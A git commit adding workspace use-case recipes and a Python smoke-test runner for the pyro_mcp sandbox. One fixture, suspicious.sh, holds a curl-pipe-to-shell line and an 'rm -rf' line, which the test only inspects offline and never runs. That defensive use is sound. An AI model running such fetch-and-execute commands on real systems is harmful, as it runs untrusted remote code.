Add use-case recipes and smoke packs

Turn the stable workspace surface into five documented, runnable stories with a shared guest-backed smoke runner, new docs/use-cases recipes, and Make targets for cold-start validation, repro/fix loops, parallel workspaces, untrusted inspection, and review/eval workflows.

Bump the package and catalog surface to 3.6.0, update the main docs to point users from the stable workspace walkthrough into the recipe index and smoke packs, and mark the 3.6.0 roadmap milestone done.

Fix a regression uncovered by the real parallel-workspaces smoke: workspace_file_read must not bump last_activity_at. Verified with uv lock, UV_CACHE_DIR=.uv-cache make check, UV_CACHE_DIR=.uv-cache make dist-check, and USE_CASE_ENVIRONMENT=debian:12 UV_CACHE_DIR=.uv-cache make smoke-use-cases.
This commit is contained in:
Thales Maciel 2026-03-13 10:27:38 -03:00
parent 21a88312b6
commit 894706af50
22 changed files with 1310 additions and 16 deletions

View file

@ -19,7 +19,7 @@ from typing import Any
from pyro_mcp.runtime import DEFAULT_PLATFORM, RuntimePaths
DEFAULT_ENVIRONMENT_VERSION = "1.0.0"
DEFAULT_CATALOG_VERSION = "3.5.0"
DEFAULT_CATALOG_VERSION = "3.6.0"
OCI_MANIFEST_ACCEPT = ", ".join(
(
"application/vnd.oci.image.index.v1+json",

View file

@ -4108,7 +4108,6 @@ class VmManager:
workspace.firecracker_pid = instance.firecracker_pid
workspace.last_error = instance.last_error
workspace.metadata = dict(instance.metadata)
self._touch_workspace_activity_locked(workspace)
self._save_workspace_locked(workspace)
return {
"workspace_id": workspace_id,

View file

@ -0,0 +1,487 @@
"""Canonical workspace use-case recipes and smoke scenarios."""
from __future__ import annotations
import argparse
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Callable, Final, Literal
from pyro_mcp.api import Pyro
# Environment the smoke scenarios use unless the caller picks another one.
DEFAULT_USE_CASE_ENVIRONMENT: Final[str] = "debian:12"

# Value of the "suite" label stamped on every workspace the scenarios create.
USE_CASE_SUITE_LABEL: Final[str] = "workspace-use-case-smoke"

# Runnable scenario names, in the order the "all" pseudo-scenario executes them.
USE_CASE_SCENARIOS: Final[tuple[str, ...]] = (
    "cold-start-validation",
    "repro-fix-loop",
    "parallel-workspaces",
    "untrusted-inspection",
    "review-eval",
)

# Pseudo-scenario that selects every entry of USE_CASE_SCENARIOS.
USE_CASE_ALL_SCENARIO: Final[str] = "all"

# Every value accepted as a scenario argument: the real scenarios plus "all".
USE_CASE_CHOICES: Final[tuple[str, ...]] = (*USE_CASE_SCENARIOS, USE_CASE_ALL_SCENARIO)
@dataclass(frozen=True)
class WorkspaceUseCaseRecipe:
    """Immutable catalog entry describing one documented workspace use case."""

    # Scenario identifier; the module indexes recipes by this value.
    scenario: str
    # Human-readable title, printed when the scenario starts.
    title: str
    # Profile name; restricted to the two literals below.
    profile: Literal["workspace-core", "workspace-full"]
    # Name of the smoke target for this recipe (presumably a Make target - confirm).
    smoke_target: str
    # Path of the recipe's markdown document (looks repo-relative - confirm).
    doc_path: str
    # Short description of what the scenario exercises.
    summary: str
# Catalog of the documented use cases, one recipe per runnable scenario.
WORKSPACE_USE_CASE_RECIPES: Final[tuple[WorkspaceUseCaseRecipe, ...]] = (
    WorkspaceUseCaseRecipe(
        scenario="cold-start-validation",
        title="Cold-Start Repo Validation",
        profile="workspace-full",
        smoke_target="smoke-cold-start-validation",
        doc_path="docs/use-cases/cold-start-repo-validation.md",
        summary=(
            "Seed a small repo, validate it, run one long-lived service, "
            "probe it, and export a report."
        ),
    ),
    WorkspaceUseCaseRecipe(
        scenario="repro-fix-loop",
        title="Repro Plus Fix Loop",
        profile="workspace-core",
        smoke_target="smoke-repro-fix-loop",
        doc_path="docs/use-cases/repro-fix-loop.md",
        summary=(
            "Reproduce a failure, patch it with model-native file ops, "
            "rerun, diff, export, and reset."
        ),
    ),
    WorkspaceUseCaseRecipe(
        scenario="parallel-workspaces",
        title="Parallel Isolated Workspaces",
        profile="workspace-core",
        smoke_target="smoke-parallel-workspaces",
        doc_path="docs/use-cases/parallel-workspaces.md",
        summary=(
            "Create and manage multiple named workspaces, "
            "mutate them independently, and verify isolation."
        ),
    ),
    WorkspaceUseCaseRecipe(
        scenario="untrusted-inspection",
        title="Unsafe Or Untrusted Code Inspection",
        profile="workspace-core",
        smoke_target="smoke-untrusted-inspection",
        doc_path="docs/use-cases/untrusted-inspection.md",
        summary=(
            "Inspect suspicious files offline-by-default, generate a report, "
            "and export only explicit results."
        ),
    ),
    WorkspaceUseCaseRecipe(
        scenario="review-eval",
        title="Review And Evaluation Workflows",
        profile="workspace-full",
        smoke_target="smoke-review-eval",
        doc_path="docs/use-cases/review-eval-workflows.md",
        summary=(
            "Walk a checklist through a PTY shell, run an evaluation, "
            "export the report, and reset to a checkpoint."
        ),
    ),
)

# Lookup from scenario name to its recipe, derived from the catalog above.
_RECIPE_BY_SCENARIO: Final[dict[str, WorkspaceUseCaseRecipe]] = {
    entry.scenario: entry for entry in WORKSPACE_USE_CASE_RECIPES
}

# Signature shared by the scenario functions; they are invoked as
# runner(pyro, root=..., environment=...).
ScenarioRunner = Callable[..., None]
def _write_text(path: Path, text: str) -> None:
    """Write ``text`` to ``path`` as UTF-8, creating missing parent directories first."""
    parent = path.parent
    parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text, encoding="utf-8")
def _log(message: str) -> None:
    """Print ``message`` with the ``[smoke]`` prefix and flush stdout immediately."""
    line = f"[smoke] {message}"
    print(line, flush=True)
def _create_workspace(
    pyro: Pyro,
    *,
    environment: str,
    seed_path: Path,
    name: str,
    labels: dict[str, str],
    network_policy: str = "off",
) -> str:
    """Create a workspace through ``pyro`` and return its id as a string.

    Every keyword argument is forwarded unchanged to ``pyro.create_workspace``;
    ``network_policy`` defaults to ``"off"``. The ``workspace_id`` entry of the
    response is coerced with ``str`` before it is returned.
    """
    request = {
        "environment": environment,
        "seed_path": seed_path,
        "name": name,
        "labels": labels,
        "network_policy": network_policy,
    }
    response = pyro.create_workspace(**request)
    workspace_id = response["workspace_id"]
    return str(workspace_id)
def _safe_delete_workspace(pyro: Pyro, workspace_id: str | None) -> None:
    """Delete ``workspace_id`` on a best-effort basis.

    Does nothing when ``workspace_id`` is ``None`` (the workspace was never
    created). Any ``Exception`` raised by ``pyro.delete_workspace`` is caught so
    that cleanup in a ``finally`` block cannot mask the scenario's own failure,
    but the failure is reported on stdout instead of being dropped silently, so
    a leaked workspace is visible in the smoke output.
    """
    if workspace_id is None:
        return
    try:
        pyro.delete_workspace(workspace_id)
    except Exception as exc:
        # Printed directly with the module's "[smoke]" prefix so this helper has
        # no dependency beyond the client object it was handed.
        print(
            f"[smoke] cleanup: failed to delete workspace_id={workspace_id}: {exc!r}",
            flush=True,
        )
def _scenario_cold_start_validation(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Validate a freshly seeded repo, run one service, probe it, and export a report.

    Seeds ``root / "seed"`` with a README and two shell scripts, creates a
    workspace from it, then asserts on each step in turn: the validation command,
    the ``app`` service start, a readiness probe, the service logs, the report
    exported under ``root / "export"``, and the service stop. The workspace is
    deleted on the way out whether or not an assertion failed.
    """
    seed_root = root / "seed"
    report_copy = root / "export" / "validation-report.txt"

    readme = "# cold-start validation\n\nRun `sh validate.sh` and keep `sh serve.sh` alive.\n"
    validate_script = "\n".join(
        (
            "#!/bin/sh",
            "set -eu",
            "printf '%s\\n' 'validation=pass' > validation-report.txt",
            "printf '%s\\n' 'validated'",
            "",  # trailing newline
        )
    )
    serve_script = "\n".join(
        (
            "#!/bin/sh",
            "set -eu",
            "printf '%s\\n' 'service started'",
            "printf '%s\\n' 'service=ready' > service-state.txt",
            "touch .app-ready",
            "while true; do sleep 60; done",
            "",  # trailing newline
        )
    )
    seed_files = {
        "README.md": readme,
        "validate.sh": validate_script,
        "serve.sh": serve_script,
    }
    for file_name, content in seed_files.items():
        _write_text(seed_root / file_name, content)

    workspace_id: str | None = None
    try:
        workspace_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_root,
            name="cold-start-validation",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "cold-start-validation"},
        )
        _log(f"cold-start-validation workspace_id={workspace_id}")

        # The one-shot validation must succeed and report the guest_vsock mode.
        validate_run = pyro.exec_workspace(workspace_id, command="sh validate.sh")
        assert int(validate_run["exit_code"]) == 0, validate_run
        assert str(validate_run["stdout"]) == "validated\n", validate_run
        assert str(validate_run["execution_mode"]) == "guest_vsock", validate_run

        # Start the long-lived service; readiness is the marker file serve.sh touches.
        app_service = pyro.start_service(
            workspace_id,
            "app",
            command="sh serve.sh",
            readiness={"type": "file", "path": ".app-ready"},
        )
        assert str(app_service["state"]) == "running", app_service

        # Probe the state the service wrote, then check its captured output.
        probe_run = pyro.exec_workspace(
            workspace_id,
            command="sh -lc 'test -f .app-ready && cat service-state.txt'",
        )
        assert probe_run["stdout"] == "service=ready\n", probe_run
        service_logs = pyro.logs_service(workspace_id, "app", tail_lines=20)
        assert "service started" in str(service_logs["stdout"]), service_logs

        # Export the validation report to the host and verify its content.
        pyro.export_workspace(workspace_id, "validation-report.txt", output_path=report_copy)
        assert report_copy.read_text(encoding="utf-8") == "validation=pass\n"

        stop_result = pyro.stop_service(workspace_id, "app")
        assert str(stop_result["state"]) == "stopped", stop_result
    finally:
        _safe_delete_workspace(pyro, workspace_id)
def _scenario_repro_fix_loop(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Reproduce a failing check, patch the file, rerun, diff, export, and reset.

    Seeds ``message.txt`` with ``broken`` plus a ``check.sh`` that only passes
    when the file says ``fixed``. The scenario asserts that the check fails
    first, passes after a unified-diff patch, that the workspace then reports a
    diff, that the exported file holds the fix, and that a reset leaves the
    workspace with no diff. The workspace is deleted on the way out.
    """
    seed_root = root / "seed"
    exported_message = root / "export" / "message.txt"

    check_script = "\n".join(
        (
            "#!/bin/sh",
            "set -eu",
            "value=$(cat message.txt)",
            '[ "$value" = "fixed" ] || {',
            " printf 'expected fixed got %s\\n' \"$value\" >&2",
            " exit 1",
            "}",
            "printf '%s\\n' \"$value\"",
            "",  # trailing newline
        )
    )
    fix_patch = "\n".join(
        (
            "--- a/message.txt",
            "+++ b/message.txt",
            "@@ -1 +1 @@",
            "-broken",
            "+fixed",
            "",  # trailing newline
        )
    )
    _write_text(seed_root / "message.txt", "broken\n")
    _write_text(seed_root / "check.sh", check_script)

    workspace_id: str | None = None
    try:
        workspace_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_root,
            name="repro-fix-loop",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "repro-fix-loop"},
        )
        _log(f"repro-fix-loop workspace_id={workspace_id}")

        # Reproduce: the seeded file is broken and the check rejects it.
        before = pyro.read_workspace_file(workspace_id, "message.txt")
        assert str(before["content"]) == "broken\n", before
        failed_check = pyro.exec_workspace(workspace_id, command="sh check.sh")
        assert int(failed_check["exit_code"]) != 0, failed_check

        # Fix: apply the patch and rerun the same check.
        patch_result = pyro.apply_workspace_patch(workspace_id, patch=fix_patch)
        assert bool(patch_result["changed"]) is True, patch_result
        passed_check = pyro.exec_workspace(workspace_id, command="sh check.sh")
        assert int(passed_check["exit_code"]) == 0, passed_check
        assert str(passed_check["stdout"]) == "fixed\n", passed_check

        # The workspace now differs; export the fixed file to the host.
        dirty_diff = pyro.diff_workspace(workspace_id)
        assert bool(dirty_diff["changed"]) is True, dirty_diff
        pyro.export_workspace(workspace_id, "message.txt", output_path=exported_message)
        assert exported_message.read_text(encoding="utf-8") == "fixed\n"

        # Reset and confirm nothing differs any more.
        reset_result = pyro.reset_workspace(workspace_id)
        assert int(reset_result["reset_count"]) == 1, reset_result
        clean_diff = pyro.diff_workspace(workspace_id)
        assert bool(clean_diff["changed"]) is False, clean_diff
    finally:
        _safe_delete_workspace(pyro, workspace_id)
def _scenario_parallel_workspaces(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Run two named workspaces side by side and verify they stay isolated.

    Creates ``parallel-alpha`` and ``parallel-beta`` from the same seed, writes a
    different ``branch.txt`` into each, updates alpha's labels, and asserts that
    each workspace still reads back its own content. It finally writes to alpha
    once more and asserts that alpha is the first of the two in the listing.
    Every workspace that was created is deleted on the way out, newest first.
    """
    seed_dir = root / "seed"
    _write_text(seed_dir / "note.txt", "shared\n")
    workspace_ids: list[str] = []
    try:
        alpha_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="parallel-alpha",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "alpha"},
        )
        # Record each id as soon as it exists so cleanup covers a partial setup.
        workspace_ids.append(alpha_id)
        beta_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="parallel-beta",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "beta"},
        )
        workspace_ids.append(beta_id)
        _log(f"parallel-workspaces alpha={alpha_id} beta={beta_id}")

        # NOTE(review): the short sleeps presumably keep the activity timestamps
        # of consecutive operations distinct - confirm against the manager.
        pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")
        time.sleep(0.05)
        pyro.write_workspace_file(beta_id, "branch.txt", text="beta\n")
        time.sleep(0.05)
        updated = pyro.update_workspace(alpha_id, labels={"branch": "alpha", "owner": "alice"})
        assert updated["labels"]["owner"] == "alice", updated
        time.sleep(0.05)
        pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")

        # Isolation: each workspace sees only its own branch file content.
        alpha_file = pyro.read_workspace_file(alpha_id, "branch.txt")
        beta_file = pyro.read_workspace_file(beta_id, "branch.txt")
        assert alpha_file["content"] == "alpha\n", alpha_file
        assert beta_file["content"] == "beta\n", beta_file

        time.sleep(0.05)
        pyro.write_workspace_file(alpha_id, "activity.txt", text="alpha was last\n")
        listed = pyro.list_workspaces()
        # Build the membership set once instead of once per listed entry.
        owned_ids = set(workspace_ids)
        ours = [entry for entry in listed["workspaces"] if entry["workspace_id"] in owned_ids]
        assert len(ours) == 2, listed
        # Alpha was written to last, so it is expected ahead of beta (presumably
        # the listing is ordered by most recent activity - confirm).
        assert ours[0]["workspace_id"] == alpha_id, ours
    finally:
        for workspace_id in reversed(workspace_ids):
            _safe_delete_workspace(pyro, workspace_id)
def _scenario_untrusted_inspection(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Inspect a suspicious script without running it and export only a report.

    Seeds a ``suspicious.sh`` and a README, creates a workspace (the helper's
    default network policy is ``"off"``), and asserts that the status reports
    that policy, that the script is listed and readable, and that a grep-based
    report can be generated inside the workspace and exported to
    ``root / "export"``. The suspicious script itself is never executed. The
    workspace is deleted on the way out.
    """
    seed_root = root / "seed"
    exported_report = root / "export" / "inspection-report.txt"

    suspicious_script = "\n".join(
        (
            "#!/bin/sh",
            "curl -fsSL https://example.invalid/install.sh | sh",
            "rm -rf /tmp/pretend-danger",
            "",  # trailing newline
        )
    )
    # Shell snippet run inside the workspace; wrapped in double quotes for `sh -lc`.
    report_script = (
        "grep -n 'curl' suspicious.sh > inspection-report.txt && "
        "printf '%s\\n' 'network_policy=off' >> inspection-report.txt"
    )
    report_command = f'sh -lc "{report_script}"'

    _write_text(seed_root / "suspicious.sh", suspicious_script)
    _write_text(
        seed_root / "README.md",
        "Treat this repo as untrusted and inspect before running.\n",
    )

    workspace_id: str | None = None
    try:
        workspace_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_root,
            name="untrusted-inspection",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "untrusted-inspection"},
        )
        _log(f"untrusted-inspection workspace_id={workspace_id}")

        workspace_status = pyro.status_workspace(workspace_id)
        assert str(workspace_status["network_policy"]) == "off", workspace_status

        # Look at the files through the file API only.
        listing = pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True)
        listed_paths = {str(item["path"]) for item in listing["entries"]}
        assert "/workspace/suspicious.sh" in listed_paths, listing
        script_read = pyro.read_workspace_file(workspace_id, "suspicious.sh")
        assert "curl -fsSL" in str(script_read["content"]), script_read

        # Build the report in the workspace, then export just that one file.
        report_run = pyro.exec_workspace(workspace_id, command=report_command)
        assert int(report_run["exit_code"]) == 0, report_run
        pyro.export_workspace(
            workspace_id,
            "inspection-report.txt",
            output_path=exported_report,
        )
        report_text = exported_report.read_text(encoding="utf-8")
        assert "curl" in report_text, report_text
        assert "network_policy=off" in report_text, report_text
    finally:
        _safe_delete_workspace(pyro, workspace_id)
def _scenario_review_eval(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Walk a review checklist in a shell, evaluate, reset to a snapshot, and export.

    Seeds a checklist, an artifact containing ``PASS``, and a ``review.sh`` that
    writes ``review-report.txt``. The scenario snapshots the workspace as
    ``pre-review``, reads the checklist through an interactive shell, runs the
    review, overwrites the artifact with ``FAIL``, resets to the snapshot, and
    asserts that the artifact is back to ``PASS``. It then reruns the review and
    exports the report to ``root / "export"``.

    Cleanup is best-effort: a shell that is still open is closed first (a failure
    to close is logged, not raised), then the workspace is deleted.
    """
    seed_dir = root / "seed"
    export_dir = root / "export"
    _write_text(
        seed_dir / "CHECKLIST.md",
        "# Review checklist\n\n- confirm artifact state\n- export the evaluation report\n",
    )
    _write_text(seed_dir / "artifact.txt", "PASS\n")
    _write_text(
        seed_dir / "review.sh",
        "#!/bin/sh\n"
        "set -eu\n"
        "if grep -qx 'PASS' artifact.txt; then\n"
        " printf '%s\\n' 'review=pass' > review-report.txt\n"
        " printf '%s\\n' 'review passed'\n"
        "else\n"
        " printf '%s\\n' 'review=fail' > review-report.txt\n"
        " printf '%s\\n' 'review failed' >&2\n"
        " exit 1\n"
        "fi\n",
    )
    workspace_id: str | None = None
    # Tracks a shell that still needs closing; set back to None once closed.
    shell_id: str | None = None
    try:
        workspace_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="review-eval",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "review-eval"},
        )
        _log(f"review-eval workspace_id={workspace_id}")

        # Checkpoint the pristine state so the later reset has a target.
        baseline_snapshot = pyro.create_snapshot(workspace_id, "pre-review")
        assert baseline_snapshot["snapshot"]["snapshot_name"] == "pre-review", baseline_snapshot

        shell = pyro.open_shell(workspace_id)
        shell_id = str(shell["shell_id"])
        # First read supplies the cursor the next read starts from, so the
        # assertion below only sees output produced after the command was sent.
        initial = pyro.read_shell(
            workspace_id,
            shell_id,
            cursor=0,
            plain=True,
            wait_for_idle_ms=300,
        )
        pyro.write_shell(workspace_id, shell_id, input="cat CHECKLIST.md")
        read = pyro.read_shell(
            workspace_id,
            shell_id,
            cursor=int(initial["next_cursor"]),
            plain=True,
            wait_for_idle_ms=300,
        )
        assert "Review checklist" in str(read["output"]), read
        closed = pyro.close_shell(workspace_id, shell_id)
        assert bool(closed["closed"]) is True, closed
        shell_id = None

        evaluation = pyro.exec_workspace(workspace_id, command="sh review.sh")
        assert int(evaluation["exit_code"]) == 0, evaluation

        # Corrupt the artifact, then prove the snapshot reset restores it.
        pyro.write_workspace_file(workspace_id, "artifact.txt", text="FAIL\n")
        reset = pyro.reset_workspace(workspace_id, snapshot="pre-review")
        assert reset["workspace_reset"]["snapshot_name"] == "pre-review", reset
        artifact = pyro.read_workspace_file(workspace_id, "artifact.txt")
        assert artifact["content"] == "PASS\n", artifact

        # Rerun the review before exporting its report.
        export_path = export_dir / "review-report.txt"
        rerun = pyro.exec_workspace(workspace_id, command="sh review.sh")
        assert int(rerun["exit_code"]) == 0, rerun
        pyro.export_workspace(workspace_id, "review-report.txt", output_path=export_path)
        assert export_path.read_text(encoding="utf-8") == "review=pass\n"
    finally:
        if shell_id is not None and workspace_id is not None:
            try:
                pyro.close_shell(workspace_id, shell_id)
            except Exception as exc:
                # Best-effort: the workspace delete below is still attempted, but
                # a shell that would not close is worth seeing in the smoke output.
                _log(f"review-eval failed to close shell_id={shell_id}: {exc!r}")
        _safe_delete_workspace(pyro, workspace_id)
# Dispatch table from scenario name to the function that runs it; consulted by
# run_workspace_use_case_scenario for each selected scenario.
_SCENARIO_RUNNERS: Final[dict[str, ScenarioRunner]] = {
    "cold-start-validation": _scenario_cold_start_validation,
    "repro-fix-loop": _scenario_repro_fix_loop,
    "parallel-workspaces": _scenario_parallel_workspaces,
    "untrusted-inspection": _scenario_untrusted_inspection,
    "review-eval": _scenario_review_eval,
}
def run_workspace_use_case_scenario(
    scenario: str,
    *,
    environment: str = DEFAULT_USE_CASE_ENVIRONMENT,
) -> None:
    """Run one use-case smoke scenario, or all of them for ``"all"``.

    Each selected scenario gets its own sub-directory of a temporary directory
    that is removed when the run ends. Scenarios run sequentially against a
    single ``Pyro`` client; an exception from a scenario propagates and stops
    the run.

    Args:
        scenario: One of ``USE_CASE_CHOICES``.
        environment: Environment name passed to every scenario.

    Raises:
        ValueError: If ``scenario`` is not one of ``USE_CASE_CHOICES``.
    """
    if scenario not in USE_CASE_CHOICES:
        raise ValueError(
            f"unknown use-case scenario {scenario!r}; "
            f"expected one of: {', '.join(USE_CASE_CHOICES)}"
        )

    if scenario == USE_CASE_ALL_SCENARIO:
        selected = USE_CASE_SCENARIOS
    else:
        selected = (scenario,)

    client = Pyro()
    with tempfile.TemporaryDirectory(prefix="pyro-workspace-use-case-") as scratch:
        scratch_root = Path(scratch)
        for selected_name in selected:
            recipe = _RECIPE_BY_SCENARIO[selected_name]
            _log(f"starting {recipe.scenario} ({recipe.title}) profile={recipe.profile}")
            # Isolate each scenario's seed/export files in its own directory.
            workdir = scratch_root / selected_name
            workdir.mkdir(parents=True, exist_ok=True)
            run_scenario = _SCENARIO_RUNNERS[selected_name]
            run_scenario(client, root=workdir, environment=environment)
            _log(f"completed {recipe.scenario}")
def build_arg_parser() -> argparse.ArgumentParser:
    """Build the command-line parser for the smoke runner.

    The parser accepts ``--scenario`` (restricted to ``USE_CASE_CHOICES``,
    defaulting to the "all" pseudo-scenario) and ``--environment`` (defaulting
    to ``DEFAULT_USE_CASE_ENVIRONMENT``).
    """
    cli = argparse.ArgumentParser(
        prog="workspace_use_case_smoke",
        description="Run real guest-backed workspace use-case smoke scenarios.",
    )
    scenario_option = {
        "choices": USE_CASE_CHOICES,
        "default": USE_CASE_ALL_SCENARIO,
        "help": "Use-case scenario to run. Defaults to all scenarios.",
    }
    environment_option = {
        "default": DEFAULT_USE_CASE_ENVIRONMENT,
        "help": "Curated environment to use for the workspace scenarios.",
    }
    cli.add_argument("--scenario", **scenario_option)
    cli.add_argument("--environment", **environment_option)
    return cli
def main() -> None:
    """Command-line entry point: parse the arguments and run the chosen scenario(s)."""
    options = build_arg_parser().parse_args()
    scenario = str(options.scenario)
    environment = str(options.environment)
    run_workspace_use_case_scenario(scenario, environment=environment)


if __name__ == "__main__":
    main()